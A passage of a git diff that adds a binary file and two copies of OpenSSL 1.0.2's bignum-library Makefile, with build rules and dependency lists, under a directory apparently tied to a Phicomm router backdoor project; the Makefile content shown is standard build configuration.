zb$eQ~&ojmGi-n;5lOq=C`l(t+!*ODr3$)ntP#0%6J>b8~o`sk}7Vy7Csu*U?tzm-p
z54}!|cKf<+T`24JwMg;zkK=YpzxJIz`CR$ZF*w{@Hg&|HV7f%B*hwu-|GyAxZhkz}
z*mEeKq505b>LY4+XJk*FO(U=E3ajDW+a1^mRRb&l1Jj5-+e6@z7ZLNpK-%Om;(7IX
z;u#Bgwyaz2KMkjiHuZe%A<pqNuvZ0qKVoquV0lj{er=jG;uJBU0{*lqfm7ZVC3w=O
zDIu%IJE8<NCD5e!9p7W910<d`+Mi+wferu!_LJVY5<KPD4=BMVZq9N$%XKx*aUWlE
z`5xqun-0NtfcP`V*}*Ws%XzgZVQ-%j0>H^`E9h>*+YZ!^KdnmOB<{oVwSj7<5^Poi
zn&QWJ`?%f%sP`{~sx{<FxssZ%V#mWX5~p;ll@C0*3G3*U{D?E#%yBVi=LXpQ95;a@
zu`>g{9fpV8fe@ok&i4RE|7ZA~SuFw6I9`k06NuFecpL`m4|80uk&oR*)V`H`Qe1h(
zNAS_FBp<<7x{`ck?Me_3AA!r~q8DI}cil~C04m}6D)=$LH^6?ca7TC^NN>VG{3e_6
zyAAR?Fe>?fuL}MV;OOTGUVp4R(s>w&ALlr``+!}9QOW<lD){9p_>C%fTNRuf%H<N+
z2GtZnmdF^Rjxb;vh9jk@nI^*q9nAJSx+4y58p(b~8a0O~S02gJ97)9D9Zgz1(b3k{
z)!Lot)|%q236dMk)BfyehNRNjoI#q}I}(mRXu&vv&@7eZDT9YHG{I6}1}w*HCNYqt
z$#lXn&8+Eo!iC&mHlOZKm<BbEk_4`1vWavym83)23{y*`jii|vNGA{H95aLR859Vp
z(_!qzZUp%T{7WFcDB;*k1b&_4_-xiocr8C)H@=bM*b(lQ^i>HDO1LfITO|CGD)?6t
zj{gTD&mSfHJ_(<f@OvfvPYG|3@CM!=Fn>9p-4c$yO2loEa5-*=gv)UcO1K<XbOKCE
zyj2jF-VEYsD*77M5J}*o4~7`JjEjC3cHyGW?segON}?`Y^y?7EF&DlShU|9XLSNiB
zp)cYdcj=2hb=rlCKJ|qQ7ky{Og^Rv3@4`iW*jFyBiF`yoqx?PyT-1%Ixue50c?dW)
z9X==|(?};(YK&2$_QPu>D)btnnpvEndPI%D6qOhPl8SFNP1IC&c-Y8*T_#Hn6~2RZ
z=4di?gwGFW^6H409WhLLlshm669Z;)*x<XmeHH>!-0Jc_s^cr_F!GjssDSaZ@Kxtc
z;M<5UA&xM|FYvqE0DA?B;$DmUx{c%RFNtqmaUHKK<L}@;Z`VG;<L?pyI2Z9(yKu38
z!CSe#JN_KcU)*=$CL{#TqrfZGZ;XFBe8Bavet1Ui`t<;YxrAZJ6y^y%EQ276yaj(*
z!erH6_lEeQuoJo&5U@t><2uOgLqd^rk-vaXf`C5V_OEmMPFFy;{TpCgseU2;iS-)~
zg!My6*o*sDDK?tSpi?BChXUdT7;by~@~c#;8Gdorxbk;R$(>c~1H9><hIN_T_WuB1
CFnGxT

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/Makefile
new file mode 100644
index 0000000..0cdbd20
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/Makefile
@@ -0,0 +1,388 @@
+#
+# OpenSSL/crypto/bn/Makefile
+#
+
+DIR=	bn
+TOP=	../..
+CC=	cc
+CPP=    $(CC) -E
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+BN_ASM=		bn_asm.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=bntest.c exptest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	bn_add.c bn_div.c bn_exp.c bn_lib.c bn_ctx.c bn_mul.c bn_mod.c \
+	bn_print.c bn_rand.c bn_shift.c bn_word.c bn_blind.c \
+	bn_kron.c bn_sqrt.c bn_gcd.c bn_prime.c bn_err.c bn_sqr.c bn_asm.c \
+	bn_recp.c bn_mont.c bn_mpi.c bn_exp2.c bn_gf2m.c bn_nist.c \
+	bn_depr.c bn_const.c bn_x931p.c
+
+LIBOBJ=	bn_add.o bn_div.o bn_exp.o bn_lib.o bn_ctx.o bn_mul.o bn_mod.o \
+	bn_print.o bn_rand.o bn_shift.o bn_word.o bn_blind.o \
+	bn_kron.o bn_sqrt.o bn_gcd.o bn_prime.o bn_err.o bn_sqr.o $(BN_ASM) \
+	bn_recp.o bn_mont.o bn_mpi.o bn_exp2.o bn_gf2m.o bn_nist.o \
+	bn_depr.o bn_const.o bn_x931p.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= bn.h
+HEADER=	bn_lcl.h bn_prime.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+bn_prime.h: bn_prime.pl
+	$(PERL) bn_prime.pl >bn_prime.h
+
+divtest: divtest.c ../../libcrypto.a
+	cc -I../../include divtest.c -o divtest ../../libcrypto.a
+
+bnbug: bnbug.c ../../libcrypto.a top
+	cc -g -I../../include bnbug.c -o bnbug ../../libcrypto.a
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+bn-586.s:	asm/bn-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/bn-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+co-586.s:	asm/co-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/co-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+x86-mont.s:	asm/x86-mont.pl ../perlasm/x86asm.pl
+	$(PERL) asm/x86-mont.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+x86-gf2m.s:	asm/x86-gf2m.pl ../perlasm/x86asm.pl
+	$(PERL) asm/x86-gf2m.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+sparcv8.o:	asm/sparcv8.S
+	$(CC) $(CFLAGS) -c asm/sparcv8.S
+bn-sparcv9.o:	asm/sparcv8plus.S
+	$(CC) $(CFLAGS) -c -o $@ asm/sparcv8plus.S
+sparcv9a-mont.s:	asm/sparcv9a-mont.pl
+	$(PERL) asm/sparcv9a-mont.pl $(CFLAGS) > $@
+sparcv9-mont.s:		asm/sparcv9-mont.pl
+	$(PERL) asm/sparcv9-mont.pl $(CFLAGS) > $@
+vis3-mont.s:		asm/vis3-mont.pl
+	$(PERL) asm/vis3-mont.pl $(CFLAGS) > $@
+sparct4-mont.S:	asm/sparct4-mont.pl
+	$(PERL) asm/sparct4-mont.pl $(CFLAGS) > $@
+sparcv9-gf2m.S:	asm/sparcv9-gf2m.pl
+	$(PERL) asm/sparcv9-gf2m.pl $(CFLAGS) > $@
+
+bn-mips3.o:	asm/mips3.s
+	@if [ "$(CC)" = "gcc" ]; then \
+		ABI=`expr "$(CFLAGS)" : ".*-mabi=\([n3264]*\)"` && \
+		as -$$ABI -O -o $@ asm/mips3.s; \
+	else	$(CC) -c $(CFLAGS) -o $@ asm/mips3.s; fi
+
+bn-mips.s:	asm/mips.pl
+	$(PERL) asm/mips.pl $(PERLASM_SCHEME) $@
+mips-mont.s:	asm/mips-mont.pl
+	$(PERL)	asm/mips-mont.pl $(PERLASM_SCHEME) $@
+
+bn-s390x.o:	asm/s390x.S
+	$(CC) $(CFLAGS) -c -o $@ asm/s390x.S
+s390x-gf2m.s:	asm/s390x-gf2m.pl
+	$(PERL) asm/s390x-gf2m.pl $(PERLASM_SCHEME) $@
+
+x86_64-gcc.o:	asm/x86_64-gcc.c
+	$(CC) $(CFLAGS) -c -o $@ asm/x86_64-gcc.c
+x86_64-mont.s:	asm/x86_64-mont.pl
+	$(PERL) asm/x86_64-mont.pl $(PERLASM_SCHEME) > $@
+x86_64-mont5.s:	asm/x86_64-mont5.pl
+	$(PERL) asm/x86_64-mont5.pl $(PERLASM_SCHEME) > $@
+x86_64-gf2m.s:	asm/x86_64-gf2m.pl
+	$(PERL) asm/x86_64-gf2m.pl $(PERLASM_SCHEME) > $@
+modexp512-x86_64.s:	asm/modexp512-x86_64.pl
+	$(PERL) asm/modexp512-x86_64.pl $(PERLASM_SCHEME) > $@
+rsaz-x86_64.s:	asm/rsaz-x86_64.pl
+	$(PERL) asm/rsaz-x86_64.pl $(PERLASM_SCHEME) > $@
+rsaz-avx2.s:	asm/rsaz-avx2.pl 
+	$(PERL) asm/rsaz-avx2.pl $(PERLASM_SCHEME) > $@
+
+bn-ia64.s:	asm/ia64.S
+	$(CC) $(CFLAGS) -E asm/ia64.S > $@
+ia64-mont.s:	asm/ia64-mont.pl
+	$(PERL) asm/ia64-mont.pl $@ $(CFLAGS)
+
+# GNU assembler fails to compile PA-RISC2 modules, insist on calling
+# vendor assembler...
+pa-risc2W.o: asm/pa-risc2W.s
+	/usr/ccs/bin/as -o pa-risc2W.o asm/pa-risc2W.s
+pa-risc2.o: asm/pa-risc2.s
+	/usr/ccs/bin/as -o pa-risc2.o asm/pa-risc2.s
+parisc-mont.s:	asm/parisc-mont.pl
+	$(PERL) asm/parisc-mont.pl $(PERLASM_SCHEME) $@
+
+# ppc - AIX, Linux, MacOS X...
+bn-ppc.s:	asm/ppc.pl;	$(PERL) asm/ppc.pl $(PERLASM_SCHEME) $@
+ppc-mont.s:	asm/ppc-mont.pl;$(PERL) asm/ppc-mont.pl $(PERLASM_SCHEME) $@
+ppc64-mont.s:	asm/ppc64-mont.pl;$(PERL) asm/ppc64-mont.pl $(PERLASM_SCHEME) $@
+
+alpha-mont.s:	asm/alpha-mont.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) asm/alpha-mont.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+
+# GNU make "catch all"
+%-mont.S:	asm/%-mont.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+%-gf2m.S:	asm/%-gf2m.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+armv4-mont.o:	armv4-mont.S
+armv4-gf2m.o:	armv4-gf2m.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+exptest:
+	rm -f exptest
+	gcc -I../../include -g2 -ggdb -o exptest exptest.c ../../libcrypto.a
+
+div:
+	rm -f a.out
+	gcc -I.. -g div.c ../../libcrypto.a
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bn_add.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_add.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_add.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_add.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_add.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_add.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_add.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_add.c bn_lcl.h
+bn_asm.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_asm.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_asm.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_asm.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_asm.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_asm.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_asm.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_asm.c bn_lcl.h
+bn_blind.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_blind.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_blind.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_blind.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_blind.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_blind.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_blind.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_blind.c bn_lcl.h
+bn_const.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bn_const.o: ../../include/openssl/opensslconf.h
+bn_const.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_const.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_const.o: ../../include/openssl/symhacks.h bn.h bn_const.c
+bn_ctx.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_ctx.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_ctx.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_ctx.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_ctx.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_ctx.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_ctx.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_ctx.c bn_lcl.h
+bn_depr.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_depr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_depr.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_depr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_depr.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bn_depr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_depr.o: ../cryptlib.h bn_depr.c bn_lcl.h
+bn_div.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_div.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_div.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_div.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_div.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_div.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_div.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_div.c bn_lcl.h
+bn_err.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bn_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+bn_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bn_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+bn_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_err.o: bn_err.c
+bn_exp.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_exp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_exp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_exp.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_exp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_exp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_exp.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_exp.c bn_lcl.h
+bn_exp2.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_exp2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_exp2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_exp2.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_exp2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_exp2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_exp2.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_exp2.c bn_lcl.h
+bn_gcd.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_gcd.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_gcd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_gcd.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_gcd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_gcd.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_gcd.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_gcd.c bn_lcl.h
+bn_gf2m.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_gf2m.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_gf2m.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_gf2m.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_gf2m.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_gf2m.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_gf2m.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_gf2m.c bn_lcl.h
+bn_kron.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_kron.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_kron.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_kron.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_kron.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_kron.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_kron.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_kron.c bn_lcl.h
+bn_lib.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_lib.c
+bn_mod.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mod.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mod.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mod.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mod.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mod.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mod.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mod.c
+bn_mont.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mont.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mont.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mont.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mont.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mont.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mont.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mont.c
+bn_mpi.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mpi.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mpi.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mpi.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mpi.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mpi.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mpi.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mpi.c
+bn_mul.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mul.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mul.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mul.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mul.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mul.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mul.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mul.c
+bn_nist.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_nist.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_nist.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_nist.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_nist.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_nist.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_nist.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_nist.c
+bn_prime.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_prime.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_prime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_prime.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_prime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_prime.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bn_prime.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_prime.o: ../cryptlib.h bn_lcl.h bn_prime.c bn_prime.h
+bn_print.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_print.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_print.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_print.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_print.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_print.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_print.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_print.c
+bn_rand.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_rand.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_rand.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_rand.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_rand.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_rand.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bn_rand.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_rand.o: ../cryptlib.h bn_lcl.h bn_rand.c
+bn_recp.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_recp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_recp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_recp.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_recp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_recp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_recp.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_recp.c
+bn_shift.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_shift.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_shift.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_shift.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_shift.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_shift.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_shift.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_shift.c
+bn_sqr.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_sqr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_sqr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_sqr.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_sqr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_sqr.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_sqr.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_sqr.c
+bn_sqrt.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_sqrt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_sqrt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_sqrt.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_sqrt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_sqrt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_sqrt.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_sqrt.c
+bn_word.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_word.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_word.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_word.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_word.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_word.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_word.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_word.c
+bn_x931p.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+bn_x931p.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+bn_x931p.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_x931p.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_x931p.o: ../../include/openssl/symhacks.h bn_x931p.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/Makefile.bak
new file mode 100644
index 0000000..0cdbd20
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/Makefile.bak
@@ -0,0 +1,388 @@
+#
+# OpenSSL/crypto/bn/Makefile
+#
+
+DIR=	bn
+TOP=	../..
+CC=	cc
+CPP=    $(CC) -E
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+BN_ASM=		bn_asm.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=bntest.c exptest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	bn_add.c bn_div.c bn_exp.c bn_lib.c bn_ctx.c bn_mul.c bn_mod.c \
+	bn_print.c bn_rand.c bn_shift.c bn_word.c bn_blind.c \
+	bn_kron.c bn_sqrt.c bn_gcd.c bn_prime.c bn_err.c bn_sqr.c bn_asm.c \
+	bn_recp.c bn_mont.c bn_mpi.c bn_exp2.c bn_gf2m.c bn_nist.c \
+	bn_depr.c bn_const.c bn_x931p.c
+
+LIBOBJ=	bn_add.o bn_div.o bn_exp.o bn_lib.o bn_ctx.o bn_mul.o bn_mod.o \
+	bn_print.o bn_rand.o bn_shift.o bn_word.o bn_blind.o \
+	bn_kron.o bn_sqrt.o bn_gcd.o bn_prime.o bn_err.o bn_sqr.o $(BN_ASM) \
